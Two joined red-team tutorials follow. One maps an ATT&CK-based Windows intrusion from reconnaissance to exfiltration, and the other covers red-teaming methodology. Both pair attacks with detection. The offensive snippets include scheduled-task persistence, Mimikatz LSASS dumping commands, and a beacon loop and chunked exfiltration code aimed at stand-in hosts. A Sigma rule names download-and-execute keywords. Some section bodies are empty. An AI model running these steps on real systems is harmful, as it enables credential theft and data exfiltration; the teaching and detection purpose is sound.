The Attack Lifecycle: Reconnaissance to Exfiltration

Objective: Understand how a real-world adversary operation unfolds across the full MITRE ATT&CK Enterprise lifecycle — from pre-engagement reconnaissance through to data exfiltration — and learn how each phase is executed by authorized red teams and detected and disrupted by defenders.

1. Red Teaming & the Attack Lifecycle — Why It Matters

MITRE ATT&CK categorizes the tactics, techniques, and procedures (TTPs) used by real-world threat actors into a standardized matrix of adversary behaviors spanning the entire attack lifecycle. It is organized into three layers:

• Tactics — the tactical goals an adversary pursues (the “why”).
• Techniques — the actions taken to achieve those goals (the “how”).
• Procedures — the concrete technical steps to perform a technique.

The Enterprise matrix contains 14 tactics, beginning with Reconnaissance (TA0043) and ending with Impact. Unlike Lockheed Martin’s linear Cyber Kill Chain, ATT&CK is a behavior catalog — a red team uses it to plan a realistic operation, and a blue team uses the same IDs to measure detection coverage. This tutorial walks a simulated Windows enterprise engagement phase by phase, pairing each offensive step with its detection telemetry.

2. Pre-Engagement: Rules of Engagement and Scoping

No technique in this tutorial is legal without written authorization. A red team operation begins with a signed Rules of Engagement (RoE) document that fixes:

Threat-model selection (e.g., emulating a specific intrusion set) drives which techniques are exercised. Everything that follows assumes explicit, documented authorization.

3. Reconnaissance & Resource Development (TA0043, TA0042)

Reconnaissance (TA0043) gathers information about the target environment for use in later phases. It splits into passive collection — which never touches target infrastructure — and active scanning.

Passive OSINT pulls from public data sources: WHOIS, Shodan, LinkedIn, and certificate transparency logs (T1590, T1589, T1593). Certificate transparency is especially valuable for surfacing subdomains and shadow infrastructure.

# Enumerate subdomains from certificate transparency logs (T1590)
curl -s "https://crt.sh/?q=%25.example.com&output=json" \
  | jq -r '.[].name_value' | sort -u

# Passive registration metadata (T1590)
whois example.com | grep -Ei 'Registrar|Name Server|Creation'

Active Scanning (T1595) — port and service discovery with tools like Nmap — is the most prominent Reconnaissance technique and the first activity that generates target-side telemetry.

Resource Development (TA0042) prepares the operational toolkit: acquiring infrastructure (T1583), establishing accounts (T1585), and obtaining or developing capabilities (T1588, T1587). For a red team this means standing up redirectors, C2 servers, and phishing domains before any contact with the target.

4. Initial Access (TA0001)

Initial Access (TA0001) is the most frequently employed tactic — it establishes the adversarial foothold. The dominant techniques are Phishing (T1566) and Valid Accounts (T1078), the latter gaining significant prominence in 2024.

In a typical spearphishing scenario, a pretext email lures a user (T1204, User Execution) into opening an attachment that spawns a child process — the handoff point into the Execution tactic.

5. Execution & Persistence (TA0002, TA0003)

Execution (TA0002) runs adversary-controlled code on the host. Command and Scripting Interpreter (T1059) — particularly PowerShell (T1059.001) and the Windows command shell (T1059.003) — is the workhorse, alongside WMI (T1047) and scheduled tasks (T1053).

Persistence (TA0003) ensures the foothold survives reboots and logoffs. Common techniques are Boot or Logon Autostart Execution (T1547) and Scheduled Task/Job (T1053.005). The following illustrates a benign scheduled-task persistence pattern and the events it generates.

# Illustrative persistence via scheduled task (T1053.005)
$action  = New-ScheduledTaskAction -Execute "powershell.exe" `
            -Argument "-NoProfile -File C:\ProgramData\update.ps1"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "SystemUpdateCheck" `
    -Action $action -Trigger $trigger -RunLevel Highest

This single command produces Windows Event ID 4698 (scheduled task created) and Sysmon Event ID 1 (process creation) with powershell.exe as the task action — a high-fidelity detection pair.

6. Privilege Escalation, Defense Evasion & Credential Access (TA0004, TA0005, TA0006)

Privilege Escalation (TA0004) seeks elevated rights via Process Injection (T1055), Valid Accounts (T1078), and Create or Modify System Process (T1543). Defense Evasion (TA0005) then hides the activity — Indicator Removal (T1070) clears event logs, and Impair Defenses (T1562) disables security tooling.

Credential Access (TA0006) harvests authentication material. OS Credential Dumping: LSASS Memory (T1003.001) reads cleartext credentials and hashes from the LSASS process. The Mimikatz syntax below is a reference for understanding what the technique reads, not a functional payload.

# Mimikatz syntax reference — LSASS memory read (T1003.001)
privilege::debug              # acquire SeDebugPrivilege
sekurlsa::logonpasswords      # parse credential material from LSASS memory

The cross-process read of lsass.exe is exactly what Sysmon Event ID 10 (ProcessAccess) is tuned to catch, typically on a GrantedAccess mask of 0x1410.

7. Discovery (TA0007)

Discovery (TA0007) maps the internal environment once inside. Built-in commands provide low-noise enumeration of accounts (T1087), permission groups (T1069), remote systems (T1018), and host configuration (T1082, T1016).

# Internal recon mapped to Discovery techniques
whoami /all                       # T1033 — user, groups, privileges
Get-ADUser -Filter *              # T1087 — domain accounts
Get-ADGroupMember "Domain Admins" # T1069 — privileged group membership
nltest /domain_trusts             # T1482 — trust relationships
Get-ADComputer -Filter *          # T1018 — remote systems

Graph-based AD enumeration with SharpHound (the BloodHound collector) accelerates this phase by mapping attack paths to high-value objects. Because SharpHound queries many hosts in rapid succession, it surfaces in Sysmon Event ID 3 (network connection) as a fan-out of LDAP and SMB connections from a single process.

8. Lateral Movement (TA0008)

Lateral Movement (TA0008) expands the foothold toward sensitive systems after internal reconnaissance. In Windows-heavy environments the primary techniques are:

Pass the Hash reuses a captured NTLM hash to authenticate without the plaintext password. Kerberoasting requests service tickets for accounts with SPNs, then cracks them offline. A Ticket Encryption Type of 0x17 (RC4-HMAC) instead of 0x12 (AES256) across many Windows Event ID 4769 records in a short window is a strong Kerberoasting indicator. SMB-based movement via PsExec also leaves Sysmon Event ID 17/18 named-pipe artifacts.

9. Collection & Command and Control (TA0009, TA0011)

Collection (TA0009) gathers target data prior to exfiltration: Data from Local System (T1005), Data from Network Shared Drive (T1039), Email Collection (T1114), and Automated Collection (T1119). Collected data is then archived (T1560) to shrink and obscure it.

# Staging collected data (T1560) before exfiltration
Compress-Archive -Path C:\Users\jdoe\Documents\*.docx `
    -DestinationPath C:\ProgramData\stage.zip
certutil -encode C:\ProgramData\stage.zip C:\ProgramData\stage.b64

Command and Control (TA0011) maintains the operator channel. Application Layer Protocol: Web Protocols (T1071.001) blends C2 into normal HTTPS, defeating deep packet inspection; Encrypted Channel (T1573) and Protocol Tunneling (T1572) add further cover. Mature implants beacon low-and-slow with jittered sleep to evade volumetric detection.

# Conceptual HTTPS beacon loop (T1071.001) — illustrative, not implant code
import time, random, requests

while True:
    task = requests.get("https://cdn.example-c2.test/poll", verify=True)
    # ... process task, return results out-of-band ...
    sleep = 60 + random.randint(-15, 15)   # jitter to flatten beacon timing
    time.sleep(sleep)

10. Exfiltration (TA0010)

In Exfiltration (TA0010) the adversary steals the staged data. Because data is already collected and archived, the focus is moving it out without tripping volume or destination alarms.

Exfiltration Over Web Service (T1567) is favored because hosts already communicate with popular SaaS providers, firewall rules likely permit that traffic, and provider SSL/TLS hides the payload. Chunking (T1030) keeps each transfer below detection thresholds.

# Conceptual chunked exfil over a web service (T1567 + T1030) — illustrative
CHUNK = 512 * 1024   # cap per request to stay under size thresholds
with open("stage.b64", "rb") as f:
    while (block := f.read(CHUNK)):
        requests.post("https://storage.example-saas.test/upload",
                      data=block, verify=True)

11. Common Attacker Techniques Across the Lifecycle

12. Defensive Strategies & Detection

Detection is most effective when Sysmon events are chained across phases rather than alerted in isolation.

Pair Sysmon with Windows Security auditing: Event 4624 (logon), 4688 (process + command line), 4698 (scheduled task), 4769 (Kerberos service ticket — watch for 0x17), and 5140/5156 (share access and allowed connections). Enable Audit Process Creation with command-line logging, PowerShell Script Block Logging, and Audit Kerberos Service Ticket Operations. ETW providers such as Microsoft-Windows-PowerShell, Microsoft-Windows-Kernel-Network, and Microsoft-Windows-SMBClient deepen visibility.

A representative Sigma rule chains suspicious PowerShell with an outbound connection:

title: PowerShell Process With Outbound Network Connection
logsource:
  product: windows
  service: sysmon
detection:
  proc:
    EventID: 1
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - 'DownloadString'
      - 'IEX'
  net:
    EventID: 3
    Image|endswith: '\powershell.exe'
  condition: proc and net
level: high

MITRE ATT&CK mapping for the primary abuse primitives:

Hardening per phase: minimize public attack surface and monitor certificate transparency; enforce MFA and patch internet-facing services (T1190); deploy Sysmon with Windows Event Forwarding to a SIEM; segment networks to restrict RDP/SMB; enable Credential Guard and AES256 Kerberos to eliminate RC4 Kerberoasting; and apply DLP with egress filtering against cloud-storage exfiltration.

13. Tools for Attack Lifecycle Analysis

For an engagement debrief, encode the simulated operation as an ATT&CK Navigator layer so the blue team can see exactly which techniques were exercised and where coverage was missing:

{
  "name": "Lifecycle Engagement - 2024",
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1595", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1566", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1059", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1003", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1021", "score": 75,  "color": "#f4a442" },
    { "techniqueID": "T1071", "score": 75,  "color": "#f4a442" },
    { "techniqueID": "T1567", "score": 100, "color": "#e60d0d" }
  ]
}

Summary

• The attack lifecycle is a continuous chain of ATT&CK tactics — Reconnaissance to Exfiltration — that red teams emulate and blue teams measure with the same technique IDs.
• Early phases (TA0043, TA0042, TA0001) establish a foothold through scanning, phishing, and valid-account abuse, while mid-chain phases escalate, evade, and harvest credentials (T1055, T1003.001, T1558.003).
• Lateral movement (T1021, T1550.002) and C2 (T1071.001) expand and sustain access before staged data is archived (T1560) and exfiltrated over trusted channels (T1041, T1567).
• Detection works best by chaining Sysmon events (1, 3, 10, 11, 17/18, 22) with Windows audit IDs (4688, 4698, 4769) and Sigma rules across phases.
• Map every emulated technique into an ATT&CK Navigator layer to expose detection gaps and drive defensive hardening.

Related Tutorials

• Phishing Campaign Design: Pretexting, Lures, and Target Profiling
• Building a Red Team Lab: Infrastructure, VMs, and C2 Setup
• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• OSINT for People and Credentials: LinkedIn, Breach Data, and Email Harvesting
• Active OSINT: DNS, Certificate Transparency, and Subdomain Enumeration

References

• Reconnaissance, Tactic TA0043 – Enterprise | MITRE ATT&CK®
• Exfiltration, Tactic TA0010 – Enterprise | MITRE ATT&CK®
• Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
• Exfiltration Over Web Service, Technique T1567 – Enterprise | MITRE ATT&CK®
• What is the MITRE ATT&CK Framework? | Microsoft Security
• Red Teaming and MITRE ATT&CK | Red Team Development and Operations

Red Teaming Fundamentals: Mindset, Methodology, and Engagement Types

Objective: Understand what a red team engagement actually is, how it differs from vulnerability assessment and penetration testing, the adversarial mindset and methodologies that structure it, the typology of engagement formats, and how every offensive action maps back to MITRE ATT&CK to produce measurable defender value.

1. What Red Teaming Actually Is

Red teaming is objective-driven adversary simulation that tests an organization’s detection and response capability — not an exhaustive enumeration of every vulnerability. A penetration test prioritizes coverage of the attack surface; a red team engagement prioritizes realism and a targeted goal: reaching high-value assets such as executive workstations, code repositories, or financial systems while remaining undetected.

The defining trait: red team engagements deliberately do not seek full coverage. They genuinely test whether the organization can block or detect an attack chain, which is why they are the longest-running of all assessment types — stealth and patience are part of the deliverable.

2. The Adversarial Mindset

A red operator thinks objective-first, not checklist-first. Compliance testing asks “is this control present?” Adversarial thinking asks “what is the cheapest path to the crown jewels that the SOC will not see?”

Three mental anchors define the mindset:

• Objective-first — every action serves a defined goal (data, access, impact). Noise that does not advance the objective is risk.
• Stealth-conscious — assume the environment is instrumented. Prefer living-off-the-land over noisy tooling; pace operations to blend with baseline activity.
• Iterative — reconnaissance, hypothesis, action, observation, adapt. A blocked path is intelligence, not a dead end.

The premise underpinning modern engagements is assume breach: perimeter compromise is treated as inevitable, so the real measurement is how fast the defender detects and contains post-compromise activity.

3. Industry Methodologies

Red teaming inherits structure from established testing methodologies, then layers ATT&CK on top for adversary realism.

PTES (Penetration Testing Execution Standard) provides the canonical seven phases:

1. Pre-engagement Interactions — scope, objectives, rules of engagement, timelines, legal/compliance
2. Intelligence Gathering — reconnaissance, OSINT, passive and active scanning
3. Threat Modeling
4. Vulnerability Analysis
5. Exploitation
6. Post-Exploitation
7. Reporting

These methodologies describe how to test; ATT&CK describes how adversaries behave. A red team uses PTES/NIST for process discipline and ATT&CK as the operating language to choose and document technique-level actions.

4. Engagement Types Deep Dive

Engagement format is chosen by organizational maturity and the question being answered.

In an Assumed Breach, the client grants the foothold — executing a payload, issuing a single-use VPN or VDI session, or staging a “stolen laptop” scenario — so the team skips Initial Access and focuses on post-exploitation.

Knowledge levels cut across all formats:

Low-maturity orgs benefit most from purple or objective-based work; mature orgs with a functioning SOC gain the most from full-scope, unannounced engagements.

5. MITRE ATT&CK as the Red Team Operating Language

MITRE ATT&CK is a globally recognized knowledge base of adversary tactics and techniques built from real-world observations. It gives red and blue a common language: tactics are the adversary’s objectives, techniques are how they achieve them, and procedures are the specific implementations.

The Enterprise Matrix spans Windows, macOS, Linux, and cloud, organized into 14 tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, and Impact.

ATT&CK Navigator lets teams annotate technique coverage as a JSON layer — color and score per technique — to track what was attempted, alerted, or blocked.

{
  "name": "Engagement-2024 Coverage",
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 100, "color": "#e60d0d", "comment": "Initial access - undetected" },
    { "techniqueID": "T1059.001", "score": 50,  "color": "#fce93a", "comment": "Executed - alerted, not blocked" },
    { "techniqueID": "T1003.001", "score": 0,   "color": "#31a354", "comment": "Blocked by Credential Guard" }
  ]
}

Although ATT&CK was created to support adversary emulation, it is equally valuable to blue teams for detection, hunting, and response — which is precisely why red teams document in ATT&CK terms.

6. The Engagement Lifecycle

The Red Team Guide condenses execution into three macro-phases: gain access, establish persistence, and perform operational impact. Expanded against ATT&CK tactics, the flow is:

Pre-Engagement ──► Recon ──► Initial Access ──► Execution ──► Persistence
   (RoE/SoW)     (TA0043)     (TA0001)          (TA0002)      (TA0003)
                                                                  │
                                                                  ▼
   Debrief/Report ◄── Exfiltration ◄── Collection ◄── Lateral Move ◄── Priv Esc
     (ATT&CK map)      (TA0010)         (TA0009)        (TA0008)       (TA0004)

Each phase produces a deliverable: pre-engagement yields the signed scope and RoE; recon yields a target profile; exploitation yields proof-of-access artifacts; reporting yields the ATT&CK-mapped findings and detection-gap backlog.

7. Rules of Engagement and Pre-Engagement

No packet is sent without written authorization. The Rules of Engagement (RoE) and Statement of Work define the legal and operational guardrails. A minimal RoE skeleton:

RULES OF ENGAGEMENT — <Client> / <Vendor>
1. Scope (in-bounds):    IP ranges, domains, cloud tenants, physical sites
2. Out-of-Scope:         Systems/data explicitly forbidden (e.g., prod payroll)
3. Authorized Actions:   Exploitation? Lateral movement? Data exfil simulation?
4. Notification State:   Announced | Unannounced (does SOC know?)
5. Deconfliction:        24/7 emergency contact, get-out-of-jail signal phrase
6. Data Handling:        Treatment of sensitive data encountered mid-op
7. Engagement Window:    Start/end dates, permitted hours
8. Legal Authorization:  Signatures, SoW reference, indemnification

The deconfliction channel and notification state are non-negotiable: they prevent a real incident response from spinning up against an authorized test and define whether the blue team is being tested blind.

8. Reconnaissance — Passive Versus Active

ATT&CK separates passive collection from active probing. T1596 (Search Open Technical Databases) sends no traffic to the target — it queries third-party indexes. T1595 (Active Scanning) probes victim infrastructure directly and is noisier and higher-risk.

import shodan, whois  # read-only OSINT libraries

api = shodan.Shodan("<authorized-engagement-key>")

# Passive WHOIS lookup — registrar/registration metadata only
record = whois.whois("scoped-target.example")
print(record.registrar, record.creation_date)

# Query Shodan's EXISTING index — no packets sent to the target host
host = api.host("203.0.113.10")
for service in host["data"]:
    print(service["port"], service["product"])

Passive recon is favored early because it leaves no trace in the target’s telemetry. Active scanning is sequenced only when scope and stealth budget permit, since it surfaces in firewall and IDS logs.

9. Adversary Emulation and the Tooling Ecosystem

Threat-informed engagements use Adversary Emulation Plans — MITRE prototype documents built from public threat reports — so operators behave like a specific group (e.g., APT29, FIN7), sticking to that actor’s known TTPs with latitude in implementation.

Atomic Red Team enables unit-style TTP testing. The pattern below runs a benign discovery technique on a lab VM to validate telemetry — it produces no harm:

# Lab VM only - benign discovery, no exploitation
Import-Module Invoke-AtomicRedTeam

# T1016 - System Network Configuration Discovery
Invoke-AtomicTest T1016 -ShowDetails
Invoke-AtomicTest T1016 -TestNumbers 1   # runs: ipconfig /all, route print

10. Red, Blue, and Purple Team Dynamics

The mode of collaboration defines the exercise. In an unannounced red team, the blue team is blind — this measures real-world detection. In a purple team, red and blue share visibility and debrief after each TTP, maximizing tradecraft coverage and detection tuning.

Purple is the fastest route to closing gaps; unannounced red is the truest measure of readiness. Mature programs alternate between them.

11. Common Attacker Techniques

A red team chains techniques across tactics. A canonical illustrative chain for teaching — not a how-to — runs:

T1566.001 Spearphishing Attachment → T1059.001 PowerShell → T1003.001 LSASS Memory → T1021.002 SMB/Admin Shares → T1048.003 Exfiltration Over Non-C2 Protocol.

MITRE ATT&CK Mapping

12. Defensive Strategies and Detection

A red team’s value is realized only when the blue team instruments the environment to measure it. Deploy Sysmon with a tuned config and enable the relevant audit policies.

Enable Audit Process Creation (feeds Sysmon EID 1 and Security EID 4688 with command-line logging), Audit Logon Events for credential-based lateral movement, Audit Object Access for exfiltration/persistence, and Audit Privilege Use for escalation. Key ETW providers include Microsoft-Windows-Kernel-Process, Microsoft-Windows-DNS-Client, AMSI, and Microsoft-Windows-PowerShell.

A foundational Sigma sketch for surfacing reconnaissance commands in process-creation telemetry:

title: Red Team Awareness - Host & Domain Discovery Commands
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4688
    CommandLine|contains:
      - 'ipconfig /all'
      - 'route print'
      - 'net group "Domain Admins"'
  condition: selection
level: low

After the engagement, generate a coverage report and feed it into ATT&CK Navigator to drive a prioritized detection backlog:

TACTICS = {
    "T1596": "Reconnaissance", "T1566.001": "Initial Access",
    "T1059.001": "Execution",  "T1003.001": "Credential Access",
    "T1021.002": "Lateral Movement", "T1041": "Exfiltration",
}
detected = {"T1059.001", "T1003.001"}   # techniques the SOC alerted on

for tid, tactic in TACTICS.items():
    status = "HIT" if tid in detected else "GAP"
    print(f"[{status}] {tactic:20} {tid}")

Adopt an assume-breach posture: segment networks so lateral movement is detectable and costly, enable PowerShell Script Block Logging via GPO, and turn on command-line auditing. Map successful detections and missed techniques back to the ATT&CK matrix to build the remediation backlog.

13. Tools for Red Team Operations

Summary

• Red teaming is objective-driven adversary simulation that measures detection and response — not exhaustive vulnerability enumeration.
• The adversarial mindset is objective-first, stealth-conscious, and iterative, anchored on an assume-breach premise.
• Engagement type (full scope, assumed breach, objective-based, threat-informed, purple) is chosen by organizational maturity and the question being asked.
• MITRE ATT&CK’s 14 tactics provide the common language that lets red document operations and blue translate findings into detections.
• Every offensive TTP is paired with Sysmon/audit telemetry and an ATT&CK-mapped debrief that produces a prioritized detection-gap backlog.

Related Tutorials

• Building a Red Team Lab: Infrastructure, VMs, and C2 Setup
• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• OPSEC Principles for Red Teamers: Staying Undetected
• Phishing Campaign Design: Pretexting, Lures, and Target Profiling
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

References

• Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
• Adversary Emulation Plans | MITRE ATT&CK®
• Azure Security Control: Penetration Tests and Red Team Exercises | Microsoft Learn
• Microsoft AI Red Team: Building the Future of Safer AI | Microsoft Security Blog
• Getting Started with ATT&CK: Adversary Emulation and Red Teaming | MITRE ATT&CK® (Medium)
• Planning Red Teaming for Large Language Models and Their Applications | Microsoft Learn